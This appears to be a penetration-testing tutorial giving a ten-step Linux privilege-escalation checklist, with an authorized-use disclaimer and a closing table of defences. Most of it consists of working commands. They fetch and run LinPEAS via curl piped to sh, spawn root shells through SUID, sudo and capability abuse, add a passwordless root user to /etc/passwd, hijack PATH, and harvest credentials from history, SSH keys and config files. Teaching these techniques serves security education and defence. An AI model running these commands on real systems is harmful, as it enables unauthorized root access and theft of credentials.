Image: linux terminal command line security hacking
—
All techniques described here are for authorized penetration testing, CTF challenges, and defensive education. Do not use against systems you don’t have explicit written permission to test.
—
You’ve landed a low-privilege shell on a Linux target. The next question is always the same: how do you get to root? Linux privilege escalation is one of the most consistent and teachable parts of offensive security — the same checks apply across nearly every Linux system, the same misconfigurations appear again and again in real environments, and the methodology is well-defined enough to work through systematically.
This is the practical checklist. Work through it in order. Most CTF boxes and a disappointing number of real systems will fall to the first five categories.
Automated Enumeration First
Before manual checks, run an automated enumeration script. These won’t find everything, but they will find the obvious and save 30 minutes of manual work.
LinPEAS (Linux Privilege Escalation Awesome Script):
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or if curl is unavailable:
wget -qO- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinEnum:
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
Read the output. LinPEAS color-codes findings by severity — start with the red/yellow highlighted items. Then work through the manual checklist to catch what automated tools miss.
1. SUID/SGID Binaries
Files with the SUID bit set execute with the owner’s privileges (typically root) regardless of who runs them. A misconfigured or exploitable SUID binary is often the fastest path to root.
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null # SGID
Cross-reference every result against GTFOBins — a comprehensive database of Unix binaries that can be exploited when they have elevated permissions. If find, vim, bash, cp, python, nmap, less, or more appear with SUID, you almost certainly have a root escalation.
Common patterns:
vimorviwith SUID:vim -c ':!/bin/sh'→ root shellfindwith SUID:find . -exec /bin/sh \; -quit→ root shellpythonwith SUID:python -c 'import os; os.execl("/bin/sh", "sh", "-p")'nmapwith SUID (older versions):nmap --interactive→!sh
2. Sudo Permissions
sudo -l
This lists what the current user can run as root (or other users) via sudo. Three categories of findings:
Direct shell access:
(ALL) NOPASSWD: /bin/bash
Run sudo /bin/bash → root shell.
GTFOBins abuse: Many legitimate programs can be used for privilege escalation when run via sudo. If sudo -l shows vim, less, python, perl, ruby, awk, nmap, socat, nc, curl, wget, or dozens of others — check GTFOBins for the sudo abuse technique.
Wildcard injection: If sudo is configured with wildcards like sudo /usr/bin/rsync *, the wildcard can be exploited by creating files with flag names: touch -- '--chmod=+s /bin/bash' causes rsync to treat that filename as a flag.
3. Cron Jobs
World-writable scripts run by cron as root are reliable escalation paths.
cat /etc/crontab
ls -la /etc/cron.*
crontab -l # current user
cat /var/spool/cron/crontabs/* # if readable
Look for:
- Scripts that are writable by the current user
- Scripts that reference world-writable directories
- Scripts that use relative paths (PATH hijacking opportunity)
# Find world-writable scripts referenced in crontabs
find /etc/cron* /var/spool/cron -type f 2>/dev/null | xargs ls -la 2>/dev/null
If a cron script is writable: add chmod +s /bin/bash to it and wait for cron to execute. Then run bash -p for a root shell.
pspy is invaluable here for capturing cron activity without root:
./pspy64 # monitors process creation without root
Watch for processes running as UID 0 that weren’t visible in crontab — some cron equivalents (anacron, systemd timers) don’t appear in the standard locations.
4. Writable Files and Directories
# World-writable files (excluding /proc, /sys)
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys
# World-writable directories
find / -writable -type d 2>/dev/null | grep -v proc | grep -v sys
# Files owned by current user that are in unusual locations
find / -user $(whoami) -type f 2>/dev/null | grep -v proc
High-value targets:
/etc/passwd— if writable, add a new root user:echo 'newroot::0:0::/root:/bin/bash' >> /etc/passwd/etc/shadow— if writable and readable, crack the root hash/etc/sudoers— if writable, add your user to sudo- Any script run by root (via cron or service)
5. Weak File Permissions on Sensitive Files
ls -la /etc/shadow /etc/passwd /etc/sudoers
cat /etc/shadow 2>/dev/null # readable shadow file = offline hash cracking
If /etc/shadow is readable, copy the root hash and crack it offline:
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# or
hashcat -m 1800 shadow.txt rockyou.txt # SHA-512 crypt
6. Capabilities
Linux capabilities provide a more granular alternative to SUID — specific privileges without full root. Some capabilities are as dangerous as SUID root.
getcap -r / 2>/dev/null
Dangerous capabilities (check GTFOBins for exploitation):
cap_setuid— can change UID to rootcap_net_raw— raw socket access (useful for packet sniffing, sometimes exploitable)cap_dac_read_search— bypass read permission checkscap_sys_ptrace— can trace/inject into other processes
Example: python3 with cap_setuid+ep:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
7. PATH Hijacking
If a SUID binary or root-executed script calls another binary by relative path (without a full path like /bin/ls), you can inject a malicious binary earlier in PATH.
# Check what's in PATH
echo $PATH
# Look for relative command calls in SUID binaries
strings /usr/bin/[suid-binary] | grep -v "/"
If the binary calls service (not /usr/sbin/service):
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
./vulnerable-suid-binary # calls your /tmp/service as root
8. NFS with no_root_squash
NFS shares configured with no_root_squash allow a remote root user to mount the share and create SUID files.
cat /etc/exports
If a share has no_root_squash:
# From your attack box (as root):
mkdir /mnt/nfs
mount -t nfs [target-ip]:[share] /mnt/nfs
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# Back on target:
/mnt/nfs/bash -p # root shell
9. Kernel Exploits
Check kernel version against known exploits:
uname -a
cat /proc/version
Search for exploits: searchsploit linux kernel [version] or check exploit-db.com. Classic kernel exploits worth knowing: Dirty COW (CVE-2016-5195), Dirty Pipe (CVE-2022-0847), OverlayFS (various).
Kernel exploits are a last resort — they can crash the system and are noisy. But on an old, unpatched kernel, they’re reliable.
10. Credential Hunting
Before assuming you need a technical exploit, check for credentials stored in the environment or config files:
# Environment variables (sometimes contain passwords)
env | grep -i pass
env | grep -i key
env | grep -i secret
# History files
cat ~/.bash_history
cat ~/.zsh_history
# Config files with passwords
find / -name ".conf" -o -name ".config" -o -name "*.ini" 2>/dev/null | xargs grep -l "password" 2>/dev/null
# SSH keys
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
ls -la ~/.ssh/
# Database credentials
find / -name "wp-config.php" -o -name ".env" -o -name "database.yml" 2>/dev/null | xargs cat 2>/dev/null
A plaintext root password in a config file or bash history is embarrassingly common and faster than any technical exploit.
The Defender’s Checklist
Every item on this offensive list maps directly to a defensive control:
| Attack | Defense |
|—|—|
| SUID abuse | Audit SUID binaries: find / -perm -4000 -type f — remove any that aren’t explicitly required |
| Sudo misconfiguration | Principle of least privilege in sudoers; avoid NOPASSWD for interactive programs |
| Writable cron scripts | Ensure cron scripts are owned by root and not world-writable |
| Readable /etc/shadow | Default permissions (640, owned root:shadow) should be enforced and monitored |
| PATH hijacking via SUID | Use full paths in all root-executed scripts |
| NFS no_root_squash | Never use no_root_squash in production; prefer root_squash or no_all_squash |
| Unpatched kernels | Patch kernels; implement kernel hardening (grsecurity, SELinux, AppArmor) |
| Credentials in env/history | Secret management (Vault, AWS Secrets Manager); disable history or clear regularly |
Linux Privilege Escalation Practice: Penetration testing and Linux security books on Amazon — complement this checklist with hands-on practice on platforms like HackTheBox and TryHackMe, where Linux privesc is a core skill tested across hundreds of machines.
Privilege escalation is more about methodology than memorization. The checklist above covers the majority of findings in real assessments and CTF boxes. Work through it systematically, use LinPEAS to catch what you miss, and cross-reference every interesting binary against GTFOBins. The root shell is almost always somewhere in the first five categories.